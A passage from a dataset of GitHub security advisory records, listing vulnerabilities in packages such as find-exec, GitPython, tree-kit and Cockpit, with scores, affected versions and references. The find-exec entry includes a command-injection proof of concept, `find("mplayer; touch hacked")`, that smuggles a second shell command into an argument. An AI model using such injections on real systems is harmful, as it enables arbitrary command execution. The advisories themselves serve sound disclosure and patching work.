SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.110 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.21 or SDK 6.0.316 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-35390]( https://www.cve.org/CVERecord?id=CVE-2023-35390) ### Revisions V1.0 (August 08, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-08-08_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NET.Build.Containers'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.307'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.306'}}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/sdk/security/advisories/GHSA-p8rx-fwgq-rh2f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35390'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/266'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/sdk'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CL2L4WE5QRT7WEXANYXSKSU43APC5N2V/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NWVZFKTLNMNKPZ755EMRYIA6GHFOWGKY/'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35390'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T13:15:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-5r33-mgjf-6656,2023-08-16T21:10:56Z,2023-08-16T15:30:18Z,,['CVE-2023-40343'],Jenkins Tuleap Authentication Plugin non-constant time token comparison,"Jenkins Tuleap Authentication Plugin 1.1.20 and earlier does not use a constant-time comparison when checking whether two authentication tokens are equal. This could potentially allow attackers to use statistical methods to obtain a valid authentication token. Tuleap Authentication Plugin 1.1.21 uses a constant-time comparison when validating authentication tokens.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:tuleap-oauth'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40343'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3229'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-203'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:10:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-5p42-m6f3-hpmj,2023-08-24T22:28:41Z,2023-08-17T00:30:26Z,,['CVE-2023-38894'],tree-kit Prototype Pollution vulnerability,A Prototype Pollution issue in Cronvel Tree-kit v.0.7.4 and before allows a remote attacker to execute arbitrary code via the extend function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'tree-kit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38894'}, {'type': 'WEB', 'url': 'https://github.com/cronvel/tree-kit/commit/61bf10cf0dbddaeea3f198cfe7cb469f360d82bc'}, {'type': 'PACKAGE', 'url': 'https://github.com/cronvel/tree-kit'}, {'type': 'WEB', 'url': 'https://www.code-intelligence.com/blog/treekit-prototype-pollution-cve-2023-38894'}, {'type': 'WEB', 'url': 'http://tree-kit.com'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-17T19:06:27Z', 'nvd_published_at': None}" 1.4.0,GHSA-vc7j-h8xg-fv5x,2023-08-04T17:26:32Z,2023-08-04T17:26:32Z,,['CVE-2023-38691'],"matrix-appservice-bridge doesn't verify the sub parameter of an openId token exhange, allowing unauthorized access to provisioning APIs","### Impact A malicious Matrix server can use a foreign user's MXID in an OpenID exchange, allowing a bad actor to impersonate users when using the provisioning API. ### Details The library does not check that the servername part of the `sub` parameter (containing the user's *claimed* MXID) is the same as the servername we are talking to. A malicious actor could spin up a server on any given domain, respond with a `sub` parameter according to the user they want to act as and use the resulting token to perform provisioning requests. ### Workarounds Disable the provisioning API. If the bridge does not use the provisioning API, you are not vulnerable. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'matrix-appservice-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '8.1.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'matrix-appservice-bridge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.1'}]}], 'versions': ['9.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge/security/advisories/GHSA-vc7j-h8xg-fv5x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38691'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge/commit/4c6723a5e7beda65cdf1ae5dbb882e8beaac8552'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/matrix-appservice-bridge'}]","{'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-04T17:26:32Z', 'nvd_published_at': None}" 1.4.0,GHSA-8rj5-2857-877j,2023-08-25T21:43:35Z,2023-08-23T13:19:55Z,,['CVE-2022-25024'],json2xml Uncaught Exception vulnerability,"The json2xml package for Python allows an error in typecode decoding enabling a remote attack that can lead to an exception, causing a denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'json2xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.14.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25024'}, {'type': 'WEB', 'url': 'https://github.com/vinitkumar/json2xml/issues/106'}, {'type': 'WEB', 'url': 'https://github.com/vinitkumar/json2xml/pull/107'}, {'type': 'WEB', 'url': 'https://github.com/vinitkumar/json2xml/pull/107/files'}, {'type': 'WEB', 'url': 'https://github.com/vinitkumar/json2xml/commit/a9cd75b61329801b47a8fba7473bce6c85a38b9b'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/json2xml/PYSEC-2023-149.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/vinitkumar/json2xml'}, {'type': 'WEB', 'url': 'https://packaging.python.org/en/latest/guides/analyzing-pypi-package-downloads/'}]","{'cwe_ids': ['CWE-248', 'CWE-754'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T13:19:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-95rp-6gqp-6622,2023-08-30T20:08:58Z,2023-08-30T20:08:58Z,,['CVE-2023-40582'],Command Injection Vulnerability in find-exec,"Older versions of the package are vulnerable to Command Injection as an attacker controlled parameter. As a result, attackers may run malicious commands. For example: ``` const find = require(""find-exec""); find(""mplayer; touch hacked"") ``` This creates a file named ""hacked"" on the filesystem. You should never allow users to control commands to find, since this package attempts to run every command provided. Thanks to @miguelafmonteiro for reporting.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'find-exec'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/shime/find-exec/security/advisories/GHSA-95rp-6gqp-6622'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40582'}, {'type': 'WEB', 'url': 'https://github.com/shime/find-exec/commit/74fb108097c229b03d6dba4cce81e36aa364b51c'}, {'type': 'PACKAGE', 'url': 'https://github.com/shime/find-exec'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-30T20:08:58Z', 'nvd_published_at': None}" 1.4.0,GHSA-x2mh-8fmc-rqgh,2023-08-29T22:27:51Z,2023-08-23T18:30:34Z,,['CVE-2023-37379'],Apache Airflow denial of service vulnerability,"Apache Airflow, in versions prior to 2.7.0, contains a security vulnerability that can be exploited by an authenticated user possessing Connection edit privileges. This vulnerability allows the user to access connection information and exploit the test connection feature by sending many requests, leading to a denial of service (DoS) condition on the server. Furthermore, malicious actors can leverage this vulnerability to establish harmful connections with the server. Users of Apache Airflow are strongly advised to upgrade to version 2.7.0 or newer to mitigate the risk associated with this vulnerability. Additionally, administrators are encouraged to review and adjust user permissions to restrict access to sensitive functionalities, reducing the attack surface. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37379'}, {'type': 'WEB', 'url': 'https://github.com/apache/airflow/pull/32052'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2023-152.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/g5c9vcn27lr14go48thrjpo6f4vw571r'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/23/4'}]","{'cwe_ids': ['CWE-200', 'CWE-400', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T12:52:17Z', 'nvd_published_at': None}" 1.4.0,GHSA-wfm5-v35h-vwf4,2023-08-29T23:33:53Z,2023-08-29T23:33:53Z,,['CVE-2023-40590'],GitPython untrusted search path on Windows systems leading to arbitrary code execution,"### Summary When resolving a program, Python/Windows look for the current working directory, and after that the PATH environment (see big warning in https://docs.python.org/3/library/subprocess.html#popen-constructor). GitPython defaults to use the `git` command, if a user runs GitPython from a repo has a `git.exe` or `git` executable, that program will be run instead of the one in the user's `PATH`. ### Details This is more of a problem on how Python interacts with Windows systems, Linux and any other OS aren't affected by this. But probably people using GitPython usually run it from the CWD of a repo. The execution of the `git` command happens in https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/cmd.py#L277 https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/cmd.py#L983-L996 And there are other commands executed that should probably be aware of this problem. ### PoC On a Windows system, create a `git.exe` or `git` executable in any directory, and import or run GitPython from that directory ``` python -c ""import git"" ``` The git executable from the current directory will be run. ### Impact An attacker can trick a user to download a repository with a malicious `git` executable, if the user runs/imports GitPython from that directory, it allows the attacker to run any arbitrary commands. ### Possible solutions - Default to an absolute path for the git program on Windows, like `C:\\Program Files\\Git\\cmd\\git.EXE` (default git path installation). - Require users to set the `GIT_PYTHON_GIT_EXECUTABLE` environment variable on Windows systems. - Make this problem prominent in the documentation and advise users to never run GitPython from an untrusted repo, or set the `GIT_PYTHON_GIT_EXECUTABLE` env var to an absolute path. - Resolve the executable manually by only looking into the `PATH` environment variable (suggested by @Byron) --- > [!NOTE] > This vulnerability was reported via email, and it was decided to publish it here and make it public, so the community is aware of it, and a fix can be provided.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'gitpython'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.33'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.1.32'}}]","[{'type': 'WEB', 'url': 'https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wfm5-v35h-vwf4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40590'}, {'type': 'WEB', 'url': 'https://github.com/gitpython-developers/GitPython/issues/1635'}, {'type': 'WEB', 'url': 'https://github.com/gitpython-developers/GitPython/pull/1636'}, {'type': 'WEB', 'url': 'https://github.com/gitpython-developers/GitPython/commit/8b75434e2c8a082cdeb4971cc6f0ee2bafec45bc'}, {'type': 'WEB', 'url': 'https://docs.python.org/3/library/subprocess.html#popen-constructor'}, {'type': 'PACKAGE', 'url': 'https://github.com/gitpython-developers/GitPython'}, {'type': 'WEB', 'url': 'https://github.com/gitpython-developers/GitPython/releases/tag/3.1.33'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2023-161.yaml'}]","{'cwe_ids': ['CWE-426'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T23:33:53Z', 'nvd_published_at': None}" 1.4.0,GHSA-5r27-rw8r-7967,2023-08-14T13:14:54Z,2023-08-08T19:26:40Z,,['CVE-2023-38704'],import-in-the-middle has unsanitized user controlled input in module generation,"### Impact The `import-in-the-middle` loader works by generating a wrapper module on the fly. The wrapper uses the module specifier to load the original module and add some wrapping code. It allows for remote code execution in cases where an application passes user-supplied input directly to an import() function. ### Patches This vulnerability has been patched in `import-in-the-middle` version 1.4.2 ### Workarounds * Do not pass any user-supplied input to `import()`. Instead, verify it against a set of allowed values. * If using `import-in-the-middle` and support for EcmaScript Modules is not needed, ensure that none of the following options are set (either via command-line or the `NODE_OPTIONS` environment variable): ``` --loader=import-in-the-middle/hook.mjs --loader import-in-the-middle/hook.mjs ``` ### References If you have any questions or comments about this advisory, email us at [security@datadoghq.com](mailto:security@datadoghq.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'import-in-the-middle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.4.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/DataDog/import-in-the-middle/security/advisories/GHSA-5r27-rw8r-7967'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38704'}, {'type': 'WEB', 'url': 'https://github.com/DataDog/import-in-the-middle/commit/2531cdd9d1d73f9eaa87c16967f60cb276c1971b'}, {'type': 'PACKAGE', 'url': 'https://github.com/DataDog/import-in-the-middle'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-08T19:26:40Z', 'nvd_published_at': None}" 1.4.0,GHSA-3vf5-xm2p-6mh5,2023-08-14T21:08:38Z,2023-08-14T12:30:22Z,,['CVE-2023-4321'],Cockpit Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit 2.6.2 and prior. A patch is available at commit 34ab31ee9362da51b9709e178469dbffd7717249.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4321'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/34ab31ee9362da51b9709e178469dbffd7717249'}, {'type': 'PACKAGE', 'url': 'https://github.com/cockpit-hq/cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/fce38751-bfd6-484c-b6e1-935e0aa8ffdc'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:08:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-xqcq-j8w9-3pxv,2023-08-01T19:53:16Z,2023-08-01T19:53:16Z,,[],Jettison parser crash by stackoverflow,"Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack. ### References - https://nvd.nist.gov/vuln/detail/CVE-2022-40149 - https://github.com/jettison-json/jettison/issues/45 - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538 - https://github.com/jettison-json/jettison/pull/49/files - https://github.com/jettison-json/jettison/releases/tag/jettison-1.5.1 - https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html - https://www.debian.org/security/2023/dsa-5312","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.tencyle.fixes:org.codehaus.jettison--jettison'}, 'versions': ['1.1-tencyle-2.1.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tencyle-fixes/jettison/security/advisories/GHSA-xqcq-j8w9-3pxv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-40149'}, {'type': 'WEB', 'url': 'https://github.com/jettison-json/jettison/issues/45'}, {'type': 'WEB', 'url': 'https://github.com/jettison-json/jettison/pull/49'}, {'type': 'WEB', 'url': 'https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538'}, {'type': 'WEB', 'url': 'https://github.com/jettison-json/jettison/releases/tag/jettison-1.5.1'}, {'type': 'PACKAGE', 'url': 'https://github.com/tencyle-fixes/jettison'}, {'type': 'WEB', 'url': 'https://github.com/tencyle-fixes/jettison#jettison-backports-repository-by-tencyle'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5312'}]","{'cwe_ids': ['CWE-121', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T19:53:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-wwww-xvm2-62w7,2023-08-16T21:08:34Z,2023-08-16T15:30:18Z,,['CVE-2023-40345'],Jenkins Delphix Plugin vulnerable to exposure of system-scoped credentials,"Jenkins Delphix Plugin 3.0.2 and earlier does not set the appropriate context for credentials lookup, allowing the use of System-scoped credentials otherwise reserved for the global configuration. This allows attackers with Overall/Read permission to access and capture credentials they are not entitled to. Delphix Plugin 3.0.3 defines the appropriate context for credentials lookup.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:delphix'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40345'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3214%20(2)'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-522'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:08:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-g3mv-64h3-h482,2023-08-24T22:33:10Z,2023-08-20T15:30:36Z,,['CVE-2023-4451'],Cockpit Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit version 2.6.3 and prior. A patch is available at commit 30609466c817e39f9de1871559603e93cd4d0d0c and anticipated to be part of version 2.6.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4451'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/30609466c817e39f9de1871559603e93cd4d0d0c'}, {'type': 'PACKAGE', 'url': 'https://github.com/cockpit-hq/cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4e111c3e-6cf3-4b4c-b3c1-a540bf30f8fa'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:25:43Z', 'nvd_published_at': None}" 1.4.0,GHSA-w7vm-4v3j-vgpw,2023-08-09T20:36:37Z,2023-08-04T15:30:15Z,,['CVE-2023-29689'],PyroCMS remote code execution vulnerability,PyroCMS 3.9 contains a remote code execution (RCE) vulnerability that can be exploited through a server-side template injection (SSTI) flaw. This vulnerability allows a malicious attacker to send customized commands to the server and execute arbitrary code on the affected system.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pyrocms/pyrocms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29689'}, {'type': 'WEB', 'url': 'https://cupc4k3.lol/ssti-leads-to-rce-on-pyrocms-7515be27c811'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyrocms/pyrocms'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/174088/Pyro-CMS-3.9-Server-Side-Template-Injection.html'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-04T17:27:09Z', 'nvd_published_at': None}" 1.4.0,GHSA-8qv2-5vq6-g2g7,2023-09-06T17:36:28Z,2023-08-25T00:12:39Z,,[],webpki: CPU denial of service in certificate path building,"When this crate is given a pathological certificate chain to validate, it will spend CPU time exponential with the number of candidate certificates at each step of path building. Both TLS clients and TLS servers that accept client certificate are affected. This was previously reported in https://github.com/briansmith/webpki/issues/69. `rustls-webpki` is a fork of this crate which contains a fix for this issue and is actively maintained.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'webpki'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.22.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.22.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/briansmith/webpki/issues/69'}, {'type': 'WEB', 'url': 'https://github.com/briansmith/webpki/issues/69#issuecomment-1699894848'}, {'type': 'WEB', 'url': 'https://github.com/briansmith/webpki/commit/30a108e0802fd09585e0d071013f24b8272d139b'}, {'type': 'PACKAGE', 'url': 'https://github.com/briansmith/webpki'}, {'type': 'WEB', 'url': 'https://github.com/crypto-com/sgx-vendor'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0052.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T00:12:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-8m65-qq6g-43rr,2023-08-18T22:46:01Z,2023-08-18T21:30:24Z,,['CVE-2023-4422'],Cockpit Cross-site Scripting vulnerability,Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit prior to 2.6.3.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4422'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/b8dad5e070608bb5e4ec58fabbee101b5af737cf'}, {'type': 'PACKAGE', 'url': 'https://github.com/cockpit-hq/cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/2e12b773-b6a2-48da-a4bb-55d5d1307d2e'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-18T22:46:01Z', 'nvd_published_at': None}" 1.4.0,GHSA-hpx4-r86g-5jrg,2023-08-29T23:33:26Z,2023-08-29T23:33:26Z,,['CVE-2023-26364'],@adobe/css-tools Regular Expression Denial of Service (ReDOS) while Parsing CSS,"### Impact @adobe/css-tools version 4.3.0 and earlier are affected by an Improper Input Validation vulnerability that could result in a denial of service while attempting to parse CSS. ### Patches The issue has been resolved in 4.3.1. ### Workarounds None ### References N/A ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@adobe/css-tools'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/adobe/css-tools/security/advisories/GHSA-hpx4-r86g-5jrg'}, {'type': 'WEB', 'url': 'https://github.com/adobe/css-tools/commit/2b09a25d1dbdbb16fe80065e4c9beb5623ee5793'}, {'type': 'PACKAGE', 'url': 'https://github.com/adobe/css-tools'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T23:33:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-cr5q-6q9f-rq6q,2023-08-23T20:36:24Z,2023-08-23T20:36:24Z,,['CVE-2023-38037'],Active Support Possibly Discloses Locally Encrypted Files,"There is a possible file disclosure of locally encrypted files in Active Support. This vulnerability has been assigned the CVE identifier CVE-2023-38037. Versions Affected: >= 5.2.0 Not affected: < 